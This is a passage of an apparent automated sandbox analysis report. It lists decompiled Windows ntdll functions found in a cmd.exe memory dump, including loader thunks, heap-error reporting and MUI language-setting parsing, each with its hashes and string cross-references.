Instruction Fuzzy Hash: 1C90027231119806E220A55D8404716044597D5241F51C821A0815558D87D588A17562

Uniqueness

Uniqueness Score: -1.00%

Function 037097A0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 037097AA

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ae451abffabc53dd05dd0a5542cc9bc16d083384f587fdda341c10d8e6bcf256
Instruction ID: aa450a566a513787845f293a5e0a822572d8942ae17e3c70beb347099dde9468
Opcode Fuzzy Hash: ae451abffabc53dd05dd0a5542cc9bc16d083384f587fdda341c10d8e6bcf256
Instruction Fuzzy Hash: 3A90026230105407E250B55D54186164445E7E5341F51D421E0405554CDA5588667662

Uniqueness

Uniqueness Score: -1.00%

Function 03709780 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0370978A

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0960d2621d091bf82f7500d82e3157d72084ed0cf75db69b52260aa099e1ffb4
Instruction ID: 91b2ea1755d7c4db1aeb9aa63a71d0aca1e6330fe50988fa8e579b0af676751e
Opcode Fuzzy Hash: 0960d2621d091bf82f7500d82e3157d72084ed0cf75db69b52260aa099e1ffb4
Instruction Fuzzy Hash: 3490026A21305406E290B55D540861A044597D5242F91D825A0006558CCA5588797761

Uniqueness

Uniqueness Score: -1.00%

Function 037096E0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 037096EA

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa15f0e34fcb2a4bf6a9230d0ca5271b5508cc4328d71840ae401a8fac464150
Instruction ID: ec91aea79e45bce8cd10bd821fd868e70b61ce71e501e610aac399978e9f0feb
Opcode Fuzzy Hash: aa15f0e34fcb2a4bf6a9230d0ca5271b5508cc4328d71840ae401a8fac464150
Instruction Fuzzy Hash: B49002722010DC06E220A55D840475A044597D4341F55C821A4415658D87D588A17561

Uniqueness

Uniqueness Score: -1.00%

Function 03709540 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0370954A

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0816a2d217b8d31b15f942d734016f38a09837c4ff1f0d77fb3a4024331cb783
Instruction ID: b1539bb99b8620cff3967cbb83460340e737877c1f0d69616d98118790304b36
Opcode Fuzzy Hash: 0816a2d217b8d31b15f942d734016f38a09837c4ff1f0d77fb3a4024331cb783
Instruction Fuzzy Hash: 64900266211054071215E95D0704517048697D9391351C431F1006550CD76188717561

Uniqueness

Uniqueness Score: -1.00%

Function 0370AD30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0370AD3A

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6dc1cbbf1916b79d9baf77a749a2319c685fb30dbf248016f4fc87fc3792f02d
Instruction ID: a68f7ae01fa1f99b5d814aa6fb7ec91e76d8449f4ee6b90dc48378a20bcc4d29
Opcode Fuzzy Hash: 6dc1cbbf1916b79d9baf77a749a2319c685fb30dbf248016f4fc87fc3792f02d
Instruction Fuzzy Hash: 80900272A0505416A250B55D48146564446A7E4781B55C421A0505554C8A948A6577E1

Uniqueness

Uniqueness Score: -1.00%

Function 037095D0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 037095DA

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5cf465837521fc74a42786b63bf65a80620cc57fbe3bae12aacc2a3c686d3b23
Instruction ID: fc3727c1aeba433f566884b79c0c49c49cd4b4e152f3d2c56d2eeb26d9c13ae1
Opcode Fuzzy Hash: 5cf465837521fc74a42786b63bf65a80620cc57fbe3bae12aacc2a3c686d3b23
Instruction Fuzzy Hash: 3E9002A2202054075215B55D4414626444A97E4241B51C431E1005590DC66588A17565

Uniqueness

Uniqueness Score: -1.00%

Function 0370967A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 03709694

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6bd4bdce35ae3f8c89e271dc4f3e1f89eff82830d0c38475905df9bb30db6bd3
Instruction ID: d1aceb08682dbe8ae20d728ee8783698a65bc5afa47375eeb52309f4bab032c7
Opcode Fuzzy Hash: 6bd4bdce35ae3f8c89e271dc4f3e1f89eff82830d0c38475905df9bb30db6bd3
Instruction Fuzzy Hash: 70B09B729014D5C9E711D764460872B7D4477D5741F16C561D2020645B4778C091F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0377B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE

Download Yara Rule

Strings

*** then kb to get the faulting stack, xrefs: 0377B51C
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0377B53F
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0377B305
write to, xrefs: 0377B4A6
*** Resource timeout (%p) in %ws:%s, xrefs: 0377B352
The instruction at %p referenced memory at %p., xrefs: 0377B432
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0377B38F
The instruction at %p tried to %s , xrefs: 0377B4B6
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0377B47D
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0377B323
*** enter .cxr %p for the context, xrefs: 0377B50D
The critical section is owned by thread %p., xrefs: 0377B3B9
This failed because of error %Ix., xrefs: 0377B446
*** Inpage error in %ws:%s, xrefs: 0377B418
Go determine why that thread has not released the critical section., xrefs: 0377B3C5
*** enter .exr %p for the exception record, xrefs: 0377B4F1
*** An Access Violation occurred in %ws:%s, xrefs: 0377B48F
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0377B314
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0377B39B
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0377B3D6
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0377B484
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0377B2DC
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0377B2F3
The resource is owned exclusively by thread %p, xrefs: 0377B374
The resource is owned shared by %d threads, xrefs: 0377B37E
read from, xrefs: 0377B4AD, 0377B4B2
<unknown>, xrefs: 0377B27E, 0377B2D1, 0377B350, 0377B399, 0377B417, 0377B48E
an invalid address, %p, xrefs: 0377B4CF
a NULL pointer, xrefs: 0377B4E0
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0377B476

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: f985dc243869a9181e417d66c955fc94b14c99895f68a8ff9f36b4984886b829
Instruction ID: 8b1710fc9002b066fb7beb8b4aa0106ecffa7b788075fc3db450628f8bff5d05
Opcode Fuzzy Hash: f985dc243869a9181e417d66c955fc94b14c99895f68a8ff9f36b4984886b829
Instruction Fuzzy Hash: AA81C279B40210FFCF29DE459C89DAE3F3AEF4BA61B444058F5062F112D3A29491DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 03781C06 Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E03781C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x36a48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E036CB150();
				} else {
					E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x37b589c);
				E036CB150("Heap error detected at %p (heap handle %p)\n",  *0x37b58a0);
				_t27 =  *0x37b5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M03781E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E036CB150();
				} else {
					E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E036CB150("Error code: %d - %s\n",  *0x37b5898);
				_t113 =  *0x37b58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E036CB150();
					} else {
						E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E036CB150("Parameter1: %p\n",  *0x37b58a4);
				}
				_t115 =  *0x37b58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E036CB150();
					} else {
						E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E036CB150("Parameter2: %p\n",  *0x37b58a8);
				}
				_t117 =  *0x37b58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E036CB150();
					} else {
						E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E036CB150("Parameter3: %p\n",  *0x37b58ac);
				}
				_t119 =  *0x37b58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E036CB150();
					} else {
						E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x37b58b4);
					E036CB150("Last known valid blocks: before - %p, after - %p\n",  *0x37b58b0);
				} else {
					_t120 =  *0x37b58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E036CB150();
				} else {
					E036CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E036CB150("Stack trace available at %p\n", 0x37b58c0);
			}

0x03781c10
0x03781c16
0x03781c1e
0x03781c3d
0x03781c3e
0x03781c20
0x03781c35
0x03781c3a
0x03781c44
0x03781c55
0x03781c5a
0x03781c65
0x03781c67
0x00000000
0x03781c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x03781c67
0x03781cdc
0x03781ce5
0x03781d04
0x03781d05
0x03781ce7
0x03781cfc
0x03781d01
0x03781d0b
0x03781d17
0x03781d1f
0x03781d25
0x03781d30
0x03781d4f
0x03781d50
0x03781d32
0x03781d47
0x03781d4c
0x03781d61
0x03781d67
0x03781d68
0x03781d6e
0x03781d79
0x03781d98
0x03781d99
0x03781d7b
0x03781d90
0x03781d95
0x03781daa
0x03781db0
0x03781db1
0x03781db7
0x03781dc2
0x03781de1
0x03781de2
0x03781dc4
0x03781dd9
0x03781dde
0x03781df3
0x03781df9
0x03781dfa
0x03781e00
0x03781e0a
0x03781e13
0x03781e32
0x03781e33
0x03781e15
0x03781e2a
0x03781e2f
0x03781e39
0x03781e4a
0x03781e02
0x03781e02
0x03781e08
0x00000000
0x00000000
0x03781e08
0x03781e5b
0x03781e7a
0x03781e7b
0x03781e5d
0x03781e72
0x03781e77
0x03781e95

Strings

heap_failure_usage_after_free, xrefs: 03781CBB
heap_failure_buffer_overrun, xrefs: 03781C98
Error code: %d - %s, xrefs: 03781D12
Parameter3: %p, xrefs: 03781DEE
Parameter1: %p, xrefs: 03781D5C
heap_failure_cross_heap_operation, xrefs: 03781CC2
heap_failure_buffer_underrun, xrefs: 03781C9F
heap_failure_virtual_block_corruption, xrefs: 03781C91
Stack trace available at %p, xrefs: 03781E86
HEAP[%wZ]: , xrefs: 03781C30, 03781CF7, 03781D42, 03781D8B, 03781DD4, 03781E25, 03781E6D
heap_failure_lfh_bitmap_mismatch, xrefs: 03781CD7
heap_failure_generic, xrefs: 03781C7C
HEAP: , xrefs: 03781C16, 03781C3D, 03781D04, 03781D4F, 03781D98, 03781DE1, 03781E32, 03781E7A
heap_failure_entry_corruption, xrefs: 03781C83
Parameter2: %p, xrefs: 03781DA5
Heap error detected at %p (heap handle %p), xrefs: 03781C50
Last known valid blocks: before - %p, after - %p, xrefs: 03781E45
heap_failure_freelists_corruption, xrefs: 03781CC9
heap_failure_multiple_entries_corruption, xrefs: 03781C8A
heap_failure_block_not_busy, xrefs: 03781CA6
heap_failure_listentry_corruption, xrefs: 03781CD0
heap_failure_invalid_argument, xrefs: 03781CAD
heap_failure_unknown, xrefs: 03781C75
heap_failure_internal, xrefs: 03781C6E
heap_failure_invalid_allocation_type, xrefs: 03781CB4

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 86568a3eff7bfcbca861b5fa3f964a863a48395379863e66cc8988e7c2efb4bc
Instruction ID: 6545045d8afdfa5dc458bd89139781d93465001905702d42b365c318fb90a1c6
Opcode Fuzzy Hash: 86568a3eff7bfcbca861b5fa3f964a863a48395379863e66cc8988e7c2efb4bc
Instruction Fuzzy Hash: 8F6162366A1684DFC211FB84E48AE7477F8EB04931B4D806EF40B6F611E6759C829F1D

Uniqueness

Uniqueness Score: -1.00%

Function 036D3D34 Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E036D3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E036D1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E036D1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E036D1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E036D1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E036D1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L036E4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0370F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E03711370(_t276, 0x36a4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0370BB40(0,  &_v68, _t170);
									if(L036D43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0370BB40(_t257,  &_v68, _t243);
								if(L036D43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E03711370(_t278, 0x36a4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L036E4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0370F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E03711370(_v16, 0x36a4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0370BB40(_t262,  &_v68, _t244);
								if(L036D43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E03711370(_t282, 0x36a4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0370BB40(_t262,  &_v68, _t201);
							if(L036D43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L036E4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0370F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E03711370(_t280, 0x36a4e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0370BB40(_t267,  &_v68, _t245);
							if(L036D43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E03711370(_t284, 0x36a4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0370BB40(_t267,  &_v68, _t224);
						if(L036D43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x036d3d3c
0x036d3d42
0x036d3d44
0x036d3d46
0x036d3d49
0x036d3d4c
0x036d3d4f
0x036d3d52
0x036d3d55
0x036d3d58
0x036d3d5b
0x036d3d5f
0x036d3d61
0x036d3d66
0x03728213
0x03728218
0x036d4085
0x036d4088
0x036d408e
0x036d4094
0x036d409a
0x036d40a0
0x036d40a6
0x036d40a9
0x036d40af
0x036d40b6
0x036d40bd
0x036d40bd
0x036d3d83
0x0372821f
0x03728229
0x03728238
0x03728238
0x0372823d
0x0372823d
0x036d3da0
0x036d3daf
0x036d3db5
0x036d3dba
0x036d3dba
0x036d3dd4
0x036d3e94
0x036d3eab
0x036d3f6d
0x036d3f84
0x036d406b
0x036d406b
0x036d406e
0x036d406e
0x036d4070
0x036d4074
0x03728351
0x03728351
0x036d407a
0x036d407f
0x0372835d
0x03728370
0x03728377
0x03728379
0x0372837c
0x0372837c
0x0372835d
0x00000000
0x036d407f
0x036d3f8a
0x036d3f8d
0x036d3f90
0x036d3f95
0x0372830d
0x0372830f
0x036d3f9b
0x036d3fac
0x036d3fae
0x036d3fb1
0x036d3fb1
0x036d3fb6
0x03728317
0x0372831a
0x00000000
0x036d3fbc
0x036d3fc1
0x036d3fc9
0x036d3fd7
0x036d3fda
0x036d3fdd
0x036d4021
0x036d4021
0x036d4029
0x036d4030
0x036d4044
0x036d4046
0x036d4046
0x036d4044
0x036d4049
0x03728327
0x03728334
